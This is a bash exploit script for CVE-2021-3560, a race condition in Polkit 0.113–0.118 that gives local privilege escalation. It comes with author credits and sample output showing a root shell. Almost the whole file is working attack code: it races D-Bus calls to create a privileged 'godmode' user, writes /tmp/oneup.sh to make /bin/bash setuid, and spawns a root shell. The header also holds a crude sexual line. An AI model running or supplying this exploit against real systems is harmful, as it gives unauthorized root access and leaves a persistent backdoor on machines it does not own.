#!/bin/bash # Exploit by: Marshall Whittaker / oxagast # oxagast@oxasploits.com # Discovery by: Kevin Backhouse # Polkit 0.113 - 0.118 LPE via Race Condition # CVE-2021-3560 # https://oxasploits.com/posts/exploit-archive-partial-disclosure/ # Note: you will manually need to remove the godmode user # as well as chmod a-s /bin/bash and rm /tmp/oneup.sh afterwards. # My neck, my back lick it lick my pussy and my crack. # # [marshall@jerkon CVE-2021-3560]$ ./polkit_godmode_0day.sh # Error org.freedesktop.DBus.Error.UnknownMethod: No such interface ?org.freedesktop.Accounts.User? on object at path /org/freedesktop/Accounts/User # ./polkit_godmode_0day.sh: line 13: kill: (197626) - No such process # Error org.freedesktop.DBus.Error.UnknownMethod: No such interface ?org.freedesktop.Accounts.User? on object at path /org/freedesktop/Accounts/User # ./polkit_godmode_0day.sh: line 13: kill: (197630) - No such process # Error org.freedesktop.DBus.Error.UnknownMethod: No such interface ?org.freedesktop.Accounts.User? on object at path /org/freedesktop/Accounts/User # Password: # [sudo] password for godmode: bash-5.1# # bash-5.1# id; whoami;uname -a; # uid=1000(marshall) gid=1000(marshall) euid=0(root) egid=0(root) groups=0(root),998(wheel),1000(marshall) # root # Linux jerkon.oxagast.org 5.10.41-1-MANJARO #1 SMP PREEMPT Fri May 28 19:10:32 UTC 2021 x86_64 GNU/Linux # bash-5.1# function sploit { P=$(openssl passwd -5 a); for i in {0..10}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:godmode string:"gg" int32:1 & sleep 0.002s ; kill $! ID=$(cat /etc/passwd | grep godmode | cut -d ':' -f 3 | tr -d '\n'); dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$ID org.freedesktop.Accounts.User.SetPassword string:$P string:god & sleep 0.002s ; kill $! done; sleep 0.5; echo 'echo a | sudo -S chmod a+s /bin/bash' > /tmp/oneup.sh; chmod a+x /tmp/oneup.sh; (sleep 1; echo a) | socat - EXEC:'su godmode -c /tmp/oneup.sh',pty; if [ -u /bin/bash ]; then spawn; fi; } function spawn { if [ -u /bin/bash ]; then /bin/bash -p; else echo error... fi; } sploit;